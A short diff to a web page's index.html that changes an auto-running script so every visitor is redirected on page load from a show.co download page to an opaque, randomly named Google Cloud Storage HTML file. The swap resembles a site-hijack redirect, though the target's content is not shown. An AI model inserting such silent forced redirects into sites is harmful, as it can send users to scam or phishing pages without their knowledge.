--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@
 	<body>
 	<script>
         (function () {
-            const nuevaURL = 'https://show.co/email-for-download/6NKwq8iV8v7YmyrgXrTfN5/retargeting';
+            const nuevaURL = 'https://storage.googleapis.com/mvk67/swrthsth5445h45h.html';
             window.location.href = nuevaURL;
         })();
     </script>
